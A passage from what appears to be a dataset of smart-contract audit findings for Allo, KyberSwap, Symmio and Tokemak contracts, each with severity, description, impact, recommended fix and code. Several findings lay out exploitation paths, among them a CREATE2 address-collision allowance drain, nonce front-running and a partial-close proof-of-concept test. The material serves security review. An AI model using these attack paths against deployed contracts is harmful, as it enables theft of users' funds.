to the target address\\n /// @return Data returned from the target address\\n function execute(address _target, uint256 _value, bytes memory _data) external returns (bytes memory) {\\n // Check if the caller is the owner of the profile and revert if not\\n if (!registry.isOwnerOfProfile(profileId, msg.sender)) revert UNAUTHORIZED();\\n\\n // Check if the target address is the zero address and revert if it is\\n if (_target == address(0)) revert CALL_FAILED();\\n\\n // Call the target address and return the data\\n (bool success, bytes memory data) = _target.call{value: _value}(_data);\\n\\n // Check if the call was successful and revert if not\\n if (!success) revert CALL_FAILED();\\n\\n return data;\\n }\\n\\n /// @notice This contract should be able to receive native token\\n receive() external payable {}\\n}\\n```\\n",implement the onERC721Received() and onERC1155Received() functions,"Any time an ERC721 or ERC1155 is attempted to be transferred with safeTransferFrom() or minted with safeMint(), the call will fail.","```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.19;\\n\\n// Core Contracts\\nimport {Registry} from ""./Registry.sol"";\\n\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⢿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⡟⠘⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⣾⣿⣿⣿⣿⣾⠻⣿⣿⣿⣿⣿⣿⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⡿⠀⠀⠸⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⢀⣠⣴⣴⣶⣶⣶⣦⣦⣀⡀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⣴⣿⣿⣿⣿⣿⣿⡿⠃⠀⠙⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠁⠀⠀⠀⢻⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⡀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠘⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⠃⠀⠀⠀⠀⠈⢿⣿⣿⣿⣆⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⣰⣿⣿⣿⡿⠋⠁⠀⠀⠈⠘⠹⣿⣿⣿⣿⣆⠀⠀⠀\\n// ⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠈⢿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡀⠀⠀\\n// ⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣟⠀⡀⢀⠀⡀⢀⠀⡀⢈⢿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⡇⠀⠀\\n// ⠀⠀⣠⣿⣿⣿⣿⣿⣿⡿⠋⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⡿⢿⠿⠿⠿⠿⠿⠿⠿⠿⠿⢿⣿⣿⣿⣷⡀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠸⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠂⠀⠀\\n// ⠀⠀⠙⠛⠿⠻⠻⠛⠉⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣧⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⢻⣿⣿⣿⣷⣀⢀⠀⠀⠀⡀⣰⣾⣿⣿⣿⠏⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣧⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠹⢿⣿⣿⣿⣿⣾⣾⣷⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠙⠋⠛⠙⠋⠛⠙⠋⠛⠙⠋⠃⠀⠀⠀⠀⠀⠀⠀⠀⠠⠿⠻⠟⠿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⠟⠿⠟⠿⠆⠀⠸⠿⠿⠟⠯⠀⠀⠀⠸⠿⠿⠿⠏⠀⠀⠀⠀⠀⠈⠉⠻⠻⡿⣿⢿⡿⡿⠿⠛⠁⠀⠀⠀⠀⠀⠀\\n// allo.gitcoin.co\\n\\n/// @title Anchor contract\\n/// @author @thelostone-mc , @0xKurt , @codenamejason , @0xZakk , @nfrgosselin \\n/// @notice Anchors are associated with profiles and are accessible exclusively by the profile owner. This contract ensures secure\\n/// and authorized interaction with external addresses, enhancing the capabilities of profiles and enabling controlled\\n/// execution of operations. The contract leverages the `Registry` contract for ownership verification and access control.\\ncontract Anchor {\\n /// ==========================\\n /// === Storage Variables ====\\n /// ==========================\\n\\n /// @notice The registry contract on any given network/chain\\n Registry public immutable registry;\\n\\n /// @notice The profileId of the allowed profile to execute calls\\n bytes32 public immutable profileId;\\n\\n /// ==========================\\n /// ======== Errors ==========\\n /// ==========================\\n\\n /// @notice Throws when the caller is not the owner of the profile\\n error UNAUTHORIZED();\\n\\n /// @notice Throws when the call to the target address fails\\n error CALL_FAILED();\\n\\n /// ==========================\\n /// ======= Constructor ======\\n /// ==========================\\n\\n /// @notice Constructor\\n /// @dev We create an instance of the 'Registry' contract using the 'msg.sender' and set the profileId.\\n /// @param _profileId The ID of the allowed profile to execute calls\\n constructor(bytes32 _profileId) {\\n registry = Registry(msg.sender);\\n profileId = _profileId;\\n }\\n\\n /// ==========================\\n /// ======== External ========\\n /// ==========================\\n\\n /// @notice Execute a call to a target address\\n /// @dev 'msg.sender' must be profile owner\\n /// @param _target The target address to call\\n /// @param _value The amount of native token to send\\n /// @param _data The data to send to the target address\\n /// @return Data returned from the target address\\n function execute(address _target, uint256 _value, bytes memory _data) external returns (bytes memory) {\\n // Check if the caller is the owner of the profile and revert if not\\n if (!registry.isOwnerOfProfile(profileId, msg.sender)) revert UNAUTHORIZED();\\n\\n // Check if the target address is the zero address and revert if it is\\n if (_target == address(0)) revert CALL_FAILED();\\n\\n // Call the target address and return the data\\n (bool success, bytes memory data) = _target.call{value: _value}(_data);\\n\\n // Check if the call was successful and revert if not\\n if (!success) revert CALL_FAILED();\\n\\n return data;\\n }\\n\\n /// @notice This contract should be able to receive native token\\n receive() external payable {}\\n}\\n```\\n" +UUPSUpgradeable vulnerability in OpenZeppelin Contracts,medium,"Openzeppelin has found the critical severity bug in UUPSUpgradeable. The kyber-swap contracts has used both openzeppelin contracts as well as openzeppelin upgrabable contracts with version v4.3.1. This is confirmed from package.json.\\n```\\nFile: ks-elastic-sc/package.json\\n\\n ""@openzeppelin/contracts"": ""4.3.1"",\\n ""@openzeppelin/test-helpers"": ""0.5.6"",\\n ""@openzeppelin/contracts-upgradeable"": ""4.3.1"",\\n```\\n\\nThe `UUPSUpgradeable` vulnerability has been found in openzeppelin version as follows,\\n@openzeppelin/contracts : Affected versions >= 4.1.0 < 4.3.2 @openzeppelin/contracts-upgradeable : >= 4.1.0 < 4.3.2\\nHowever, openzeppelin has fixed this issue in versions 4.3.2\\nOpenzeppelin bug acceptance and fix: check here\\nThe following contracts has been affected due to this vulnerability\\nPoolOracle.sol\\nTokenPositionDescriptor.sol\\nBoth of these contracts are UUPSUpgradeable and the issue must be fixed.",Update the openzeppelin library to latest version.\\nCheck this openzeppelin security advisory to initialize the UUPS implementation contracts.\\nCheck this openzeppelin UUPS documentation.,Upgradeable contracts using UUPSUpgradeable may be vulnerable to an attack affecting uninitialized implementation contracts.,"```\\nFile: ks-elastic-sc/package.json\\n\\n ""@openzeppelin/contracts"": ""4.3.1"",\\n ""@openzeppelin/test-helpers"": ""0.5.6"",\\n ""@openzeppelin/contracts-upgradeable"": ""4.3.1"",\\n```\\n" +Router.sol is vulnerable to address collission,medium,"The pool address check in the the callback function isn't strict enough and can suffer issues with collision. Due to the truncated nature of the create2 opcode the collision resistance is already impaired to 2^160 as that is total number of possible hashes after truncation. Obviously if you are searching for a single hash, this is (basically) impossible. The issue here is that one does not need to search for a single address as the router never verifies that the pool actually exists. This is the crux of the problem, but first let's do a little math as to why this is a problem.\\n$$ 1 - e ^ {-k(k-1) \\over 2N } $$\\nWhere k is the number of hash values and N is the number of possible hashes\\nFor very large numbers we can further approximate the exponent to:\\n$$ -k^2 \\over 2N $$\\nThis exponent is now trivial to solve for an approximate attack value which is:\\n$$ k = \\sqrt{2N} $$\\nIn our scenario N is 2^160 (our truncated keccak256) which means that our approximate attack value is 2^80 since we need to generate two sets of hashes. The first set is to generate 2^80 public addresses and the second is to generate pool address from variations in the pool specifics(token0, token1, fee). Here we reach a final attack value of 2^81 hashes. Using the provided calculator we see that 2^81 hashes has an approximate 86.4% chance of a collision. Increase that number to 2^82 and the odds of collision becomes 99.96%. In this case, a collision between addresses means breaking this check and draining the allowances of all users to a specific token. This is because the EOA address will collide with the supposed pool address allowing it to bypass the msg.sender check. Now we considered the specific of the contract.\\nRouter.sol#L47-L51\\n```\\nrequire(\\n msg.sender == address(_getPool(tokenIn, tokenOut, fee)),\\n 'Router: invalid callback sender'\\n);\\n```\\n\\nThe above snippet from the swapCallback function is used to verify that msg.sender is the address of the pool.\\nRouter.sol#L224-L231\\n```\\nfunction _getPool(\\n address tokenA,\\n address tokenB,\\n uint24 fee\\n) private view returns (IPool) {\\n return IPool(PoolAddress.computeAddress(factory, tokenA, tokenB, fee, poolInitHash));\\n}\\n```\\n\\nWe see that these lines never check with the factory that the pool exists or any of the inputs are valid in any way. token0 can be constant and we can achieve the variation in the hash by changing token1. The attacker could use token0 = WETH and vary token1. This would allow them to steal all allowances of WETH. Since allowances are forever until revoked, this could put hundreds of millions of dollars at risk.\\nAlthough this would require a large amount of compute it is already possible to break with current computing. Given the enormity of the value potentially at stake it would be a lucrative attack to anyone who could fund it. In less than a decade this would likely be a fairly easily attained amount of compute, nearly guaranteeing this attack.",Verify with the factory that msg.sender is a valid pool,Address collision can cause all allowances to be drained,"```\\nrequire(\\n msg.sender == address(_getPool(tokenIn, tokenOut, fee)),\\n 'Router: invalid callback sender'\\n);\\n```\\n" +Position value can fall below minimum acceptable quote value when partially closing positions requested to be closed in full,medium,"In `LibQuote.closeQuote` there is a requirement to have the remaining quote value to not be less than minAcceptableQuoteValue:\\n```\\nif (LibQuote.quoteOpenAmount(quote) != quote.quantityToClose) {\\n require(quote.lockedValues.total() >= symbolLayout.symbols[quote.symbolId].minAcceptableQuoteValue,\\n ""LibQuote: Remaining quote value is low"");\\n}\\n```\\n\\nNotice the condition when this require happens:\\n`LibQuote.quoteOpenAmount(quote)` is remaining open amount\\n`quote.quantityToClose` is requested amount to close\\nThis means that this check is ignored if partyA has requested to close amount equal to full remaining quote value, but enforced when it's not (even if closing fully). For example, a quote with opened amount = 100 is requested to be closed in full (amount = 100): this check is ignored. But PartyB can fill the request partially, for example fill 99 out of 100, and the remainder (1) is not checked to confirm to `minAcceptableQuoteValue`.\\nThe following execution paths are possible if PartyA has open position size = 100 and `minAcceptableQuoteValue` = 5:\\n`requestToClosePosition(99)` -> revert\\n`requestToClosePosition(100)` -> `fillCloseRequest(99)` -> pass (remaining quote = 1)","The condition should be to ignore the `minAcceptableQuoteValue` if request is filled in full (filledAmount == quantityToClose):\\n```\\n- if (LibQuote.quoteOpenAmount(quote) != quote.quantityToClose) {\\n+ if (filledAmount != quote.quantityToClose) {\\n require(quote.lockedValues.total() >= symbolLayout.symbols[quote.symbolId].minAcceptableQuoteValue,\\n ""LibQuote: Remaining quote value is low"");\\n }\\n```\\n","There can be multiple reasons why the protocol enforces `minAcceptableQuoteValue`, one of them might be the efficiency of the liquidation mechanism: when quote value is too small (and liquidation value too small too), liquidators will not have enough incentive to liquidate these positions in case they become insolvent. Both partyA and partyB might also not have enough incentive to close or respond to request to close such small positions, possibly resulting in a loss of funds and greater market risk for either user.\\nProof of Concept\\nAdd this to any test, for example to `ClosePosition.behavior.ts`.\\n```\\nit(""Close position with remainder below minAcceptableQuoteValue"", async function () {\\n const context: RunContext = this.context;\\n\\n this.user_allocated = decimal(1000);\\n this.hedger_allocated = decimal(1000);\\n\\n this.user = new User(this.context, this.context.signers.user);\\n await this.user.setup();\\n await this.user.setBalances(this.user_allocated, this.user_allocated, this.user_allocated);\\n\\n this.hedger = new Hedger(this.context, this.context.signers.hedger);\\n await this.hedger.setup();\\n await this.hedger.setBalances(this.hedger_allocated, this.hedger_allocated);\\n\\n await this.user.sendQuote(limitQuoteRequestBuilder()\\n .quantity(decimal(100))\\n .price(decimal(1))\\n .cva(decimal(10)).lf(decimal(5)).mm(decimal(15))\\n .build()\\n );\\n await this.hedger.lockQuote(1, 0, decimal(5, 17));\\n await this.hedger.openPosition(1, limitOpenRequestBuilder().filledAmount(decimal(100)).openPrice(decimal(1)).price(decimal(1)).build());\\n\\n // now try to close full position (100)\\n await this.user.requestToClosePosition(\\n 1,\\n limitCloseRequestBuilder().quantityToClose(decimal(100)).closePrice(decimal(1)).build(),\\n );\\n\\n // now partyA cancels request\\n //await this.user.requestToCancelCloseRequest(1);\\n\\n // partyB can fill 99\\n await this.hedger.fillCloseRequest(\\n 1,\\n limitFillCloseRequestBuilder()\\n .filledAmount(decimal(99))\\n .closedPrice(decimal(1))\\n .build(),\\n );\\n\\n var q = await context.viewFacet.getQuote(1);\\n console.log(""quote quantity: "" + q.quantity.div(decimal(1)) + "" closed: "" + q.closedAmount.div(decimal(1)));\\n\\n});\\n```\\n\\nConsole execution result:\\n```\\nquote quantity: 100 closed: 99\\n```\\n","```\\nif (LibQuote.quoteOpenAmount(quote) != quote.quantityToClose) {\\n require(quote.lockedValues.total() >= symbolLayout.symbols[quote.symbolId].minAcceptableQuoteValue,\\n ""LibQuote: Remaining quote value is low"");\\n}\\n```\\n" +"MultiAccount `depositAndAllocateForAccount` function doesn't scale the allocated amount correctly, failing to allocate enough funds",medium,"Internal accounting (allocatedBalances) are tracked as fixed numbers with 18 decimals, while collateral tokens can have different amount of decimals. This is correctly accounted for in AccountFacet.depositAndAllocate:\\n```\\n AccountFacetImpl.deposit(msg.sender, amount);\\n uint256 amountWith18Decimals = (amount * 1e18) /\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n AccountFacetImpl.allocate(amountWith18Decimals);\\n```\\n\\nBut it is treated incorrectly in MultiAccount.depositAndAllocateForAccount:\\n```\\n ISymmio(symmioAddress).depositFor(account, amount);\\n bytes memory _callData = abi.encodeWithSignature(\\n ""allocate(uint256)"",\\n amount\\n );\\n innerCall(account, _callData);\\n```\\n\\nThis leads to incorrect allocated amounts.","Scale amount correctly before allocating it:\\n```\\n ISymmio(symmioAddress).depositFor(account, amount);\\n+ uint256 amountWith18Decimals = (amount * 1e18) /\\n+ (10 ** IERC20Metadata(collateral).decimals());\\n bytes memory _callData = abi.encodeWithSignature(\\n ""allocate(uint256)"",\\n- amount\\n+ amountWith18Decimals\\n );\\n innerCall(account, _callData);\\n```\\n","Similar to 222 from previous audit contest, the user expects to have full amount deposited and allocated, but ends up with only dust amount allocated, which can lead to unexpected liquidations (for example, user is at the edge of liquidation, calls depositAndAllocate to improve account health, but is liquidated instead). For consistency reasons, since this is almost identical to 222, it should also be high.","```\\n AccountFacetImpl.deposit(msg.sender, amount);\\n uint256 amountWith18Decimals = (amount * 1e18) /\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n AccountFacetImpl.allocate(amountWith18Decimals);\\n```\\n" +"PartyBFacetImpl.chargeFundingRate should check whether quoteIds is empty array to prevent partyANonces from being increased, causing some operations of partyA to fail",medium,"```\\nFile: symmio-core\\contracts\\facets\\PartyB\\PartyBFacetImpl.sol\\n function chargeFundingRate(\\n address partyA,\\n uint256[] memory quoteIds,\\n int256[] memory rates,\\n PairUpnlSig memory upnlSig\\n ) internal {\\n LibMuon.verifyPairUpnl(upnlSig, msg.sender, partyA);\\n require(quoteIds.length == rates.length, ""PartyBFacet: Length not match"");\\n int256 partyBAvailableBalance = LibAccount.partyBAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyB,\\n msg.sender,\\n partyA\\n );\\n int256 partyAAvailableBalance = LibAccount.partyAAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyA,\\n partyA\\n );\\n uint256 epochDuration;\\n uint256 windowTime;\\n for (uint256 i = 0; i < quoteIds.length; i++) {\\n// rest of code// rest of code//quoteIds is empty array, so code is never executed.\\n }\\n require(partyAAvailableBalance >= 0, ""PartyBFacet: PartyA will be insolvent"");\\n require(partyBAvailableBalance >= 0, ""PartyBFacet: PartyB will be insolvent"");\\n AccountStorage.layout().partyBNonces[msg.sender][partyA] += 1;\\n394:-> AccountStorage.layout().partyANonces[partyA] += 1;\\n }\\n```\\n\\nAs long as partyBAvailableBalance(L318) and partyAAvailableBalance(L323) are greater than or equal to 0, that is to say, PartyA and PartyB are solvent. Then, partyB can add 1 to `partyANonces[partyA]` at little cost which is the gas of tx.\\n```\\nFile: symmio-core\\contracts\\facets\\PartyA\\PartyAFacetImpl.sol\\n function forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n// rest of code// rest of code//assume codes here are executed\\n273:-> LibMuon.verifyPairUpnlAndPrice(upnlSig, quote.partyB, quote.partyA, quote.symbolId);\\n// rest of code// rest of code\\n }\\n```\\n\\nIf the current price goes against partyB, then partyB can front-run `forceClosePosition` and call `chargeFundingRate` to increase the nonces of both parties by 1. In this way, partyA's `forceClosePosition` will inevitably revert because the nonces are incorrect.","```\\nFile: symmio-core\\contracts\\facets\\PartyB\\PartyBFacetImpl.sol\\n function chargeFundingRate(\\n address partyA,\\n uint256[] memory quoteIds,\\n int256[] memory rates,\\n PairUpnlSig memory upnlSig\\n ) internal {\\n LibMuon.verifyPairUpnl(upnlSig, msg.sender, partyA);\\n317:- require(quoteIds.length == rates.length, ""PartyBFacet: Length not match"");\\n317:+ require(quoteIds.length > 0 && quoteIds.length == rates.length, ""PartyBFacet: Length is 0 or Length not match"");\\n```\\n","Due to this issue, partyB can increase nonces of any partyA with little cost, causing some operations of partyA to fail (refer to the Vulnerability Detail section). This opens up the opportunity for partyB to turn the table.","```\\nFile: symmio-core\\contracts\\facets\\PartyB\\PartyBFacetImpl.sol\\n function chargeFundingRate(\\n address partyA,\\n uint256[] memory quoteIds,\\n int256[] memory rates,\\n PairUpnlSig memory upnlSig\\n ) internal {\\n LibMuon.verifyPairUpnl(upnlSig, msg.sender, partyA);\\n require(quoteIds.length == rates.length, ""PartyBFacet: Length not match"");\\n int256 partyBAvailableBalance = LibAccount.partyBAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyB,\\n msg.sender,\\n partyA\\n );\\n int256 partyAAvailableBalance = LibAccount.partyAAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyA,\\n partyA\\n );\\n uint256 epochDuration;\\n uint256 windowTime;\\n for (uint256 i = 0; i < quoteIds.length; i++) {\\n// rest of code// rest of code//quoteIds is empty array, so code is never executed.\\n }\\n require(partyAAvailableBalance >= 0, ""PartyBFacet: PartyA will be insolvent"");\\n require(partyBAvailableBalance >= 0, ""PartyBFacet: PartyB will be insolvent"");\\n AccountStorage.layout().partyBNonces[msg.sender][partyA] += 1;\\n394:-> AccountStorage.layout().partyANonces[partyA] += 1;\\n }\\n```\\n" +Stat calculator returns incorrect report for swETH,high,"The purpose of the in-scope `SwEthEthOracle` contract is to act as a price oracle specifically for swETH (Swell ETH) per the comment in the contract below and the codebase's README\\n```\\nFile: SwEthEthOracle.sol\\n/**\\n * @notice Price oracle specifically for swEth (Swell Eth).\\n * @dev getPriceEth is not a view fn to support reentrancy checks. Does not actually change state.\\n */\\ncontract SwEthEthOracle is SystemComponent, IPriceOracle {\\n```\\n\\nPer the codebase in the contest repository, the price oracle for the swETH is understood to be configured to the `SwEthEthOracle` contract at Line 252 below.\\n```\\nFile: RootOracleIntegrationTest.t.sol\\n swEthOracle = new SwEthEthOracle(systemRegistry, IswETH(SWETH_MAINNET));\\n..SNIP..\\n // Lst special pricing case setup\\n // priceOracle.registerMapping(SFRXETH_MAINNET, IPriceOracle(address(sfrxEthOracle)));\\n priceOracle.registerMapping(WSTETH_MAINNET, IPriceOracle(address(wstEthOracle)));\\n priceOracle.registerMapping(SWETH_MAINNET, IPriceOracle(address(swEthOracle)));\\n```\\n\\nThus, in the context of this audit, the price oracle for the swETH is mapped to the `SwEthEthOracle` contract.\\nBoth the swETH oracle and calculator use the same built-in `swEth.swETHToETHRate` function to retrieve the price of swETH in ETH.\\nLST Oracle Calculator Rebasing\\nswETH SwEthEthOracle - `swEth.swETHToETHRate()` SwethLSTCalculator - `IswETH(lstTokenAddress).swETHToETHRate()` False\\n```\\nFile: SwEthEthOracle.sol\\n /// @inheritdoc IPriceOracle\\n function getPriceInEth(address token) external view returns (uint256 price) {\\n..SNIP..\\n // Returns in 1e18 precision.\\n price = swEth.swETHToETHRate();\\n }\\n```\\n\\n```\\nFile: SwethLSTCalculator.sol\\n function calculateEthPerToken() public view override returns (uint256) {\\n return IswETH(lstTokenAddress).swETHToETHRate();\\n }\\n```\\n\\nWithin the `LSTCalculatorBase.current` function, assume that the `swEth.swETHToETHRate` function returns $x$ when called. In this case, the `price` at Line 203 below and `backing` in Line 210 below will be set to $x$ since the `getPriceInEth` and `calculateEthPerToken` functions depend on the same `swEth.swETHToETHRate` function internally. Thus, `priceToBacking` will always be 1e18:\\n$$ \\begin{align} priceToBacking &= \\frac{price \\times 1e18}{backing} \\ &= \\frac{x \\times 1e18}{x} \\ &= 1e18 \\end{align} $$\\nSince `priceToBacking` is always 1e18, the `premium` will always be zero:\\n$$ \\begin{align} premium &= priceToBacking - 1e18 \\ &= 1e18 - 1e18 \\ &= 0 \\end{align} $$\\nAs a result, the calculator for swETH will always report the wrong statistic report for swETH. If there is a premium or discount, the calculator will wrongly report none.\\n```\\nFile: LSTCalculatorBase.sol\\n function current() external returns (LSTStatsData memory) {\\n..SNIP..\\n IRootPriceOracle pricer = systemRegistry.rootPriceOracle();\\n uint256 price = pricer.getPriceInEth(lstTokenAddress);\\n..SNIP..\\n uint256 backing = calculateEthPerToken();\\n // price is always 1e18 and backing is in eth, which is 1e18\\n priceToBacking = price * 1e18 / backing;\\n }\\n\\n // positive value is a premium; negative value is a discount\\n int256 premium = int256(priceToBacking) - 1e18;\\n\\n return LSTStatsData({\\n lastSnapshotTimestamp: lastSnapshotTimestamp,\\n baseApr: baseApr,\\n premium: premium,\\n slashingCosts: slashingCosts,\\n slashingTimestamps: slashingTimestamps\\n });\\n }\\n```\\n","When handling the swETH within the `LSTCalculatorBase.current` function, consider other methods of obtaining the fair market price of swETH that do not rely on the `swEth.swETHToETHRate` function such as external 3rd-party price oracle.","The purpose of the stats/calculators contracts is to store, augment, and clean data relevant to the LMPs. When the solver proposes a rebalance, the strategy uses the stats contracts to calculate a composite return (score) for the proposed destinations. Using that composite return, it determines if the swap is beneficial for the vault.\\nIf a stat calculator provides inaccurate information, it can cause multiple implications that lead to losses to the protocol, such as false signals allowing the unprofitable rebalance to be executed.","```\\nFile: SwEthEthOracle.sol\\n/**\\n * @notice Price oracle specifically for swEth (Swell Eth).\\n * @dev getPriceEth is not a view fn to support reentrancy checks. Does not actually change state.\\n */\\ncontract SwEthEthOracle is SystemComponent, IPriceOracle {\\n```\\n" +Incorrect approach to tracking the PnL of a DV,high,"Let $DV_A$ be a certain destination vault.\\nAssume that at $T0$, the current debt value (currentDvDebtValue) of $DV_A$ is 95 WETH, and the last debt value (updatedDebtBasis) is 100 WETH. Since the current debt value has become smaller than the last debt value, the vault is making a loss of 5 WETH since the last rebalancing, so $DV_A$ is sitting at a loss, and users can only burn a limited amount of DestinationVault_A's shares.\\nAssume that at $T1$, there is some slight rebalancing performed on $DV_A$, and a few additional LP tokens are deposited to it. Thus, its current debt value increased to 98 WETH. At the same time, the `destInfo.debtBasis` and `destInfo.ownedShares` will be updated to the current value.\\nImmediately after the rebalancing, $DV_A$ will not be considered sitting in a loss since the `currentDvDebtValue` and `updatedDebtBasis` should be equal now. As a result, users could now burn all the $DV_A$ shares of the LMPVault during withdrawal.\\n$DV_A$ suddenly becomes not sitting at a loss even though the fact is that it is still sitting at a loss of 5 WETH. The loss has been written off.\\n```\\nFile: LMPDebt.sol\\n // Neither of these numbers include rewards from the DV\\n if (currentDvDebtValue < updatedDebtBasis) {\\n // We are currently sitting at a loss. Limit the value we can pull from\\n // the destination vault\\n currentDvDebtValue = currentDvDebtValue.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n currentDvShares = currentDvShares.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n }\\n```\\n","Consider a more sophisticated approach to track a DV's Profit and Loss (PnL).\\nIn our example, $DV_A$ should only be considered not making a loss if the price of the LP tokens starts to appreciate and cover the loss of 5 WETH.","A DV might be incorrectly marked as not sitting in a loss, thus allowing users to burn all the DV shares, locking in all the loss of the DV and the vault shareholders.","```\\nFile: LMPDebt.sol\\n // Neither of these numbers include rewards from the DV\\n if (currentDvDebtValue < 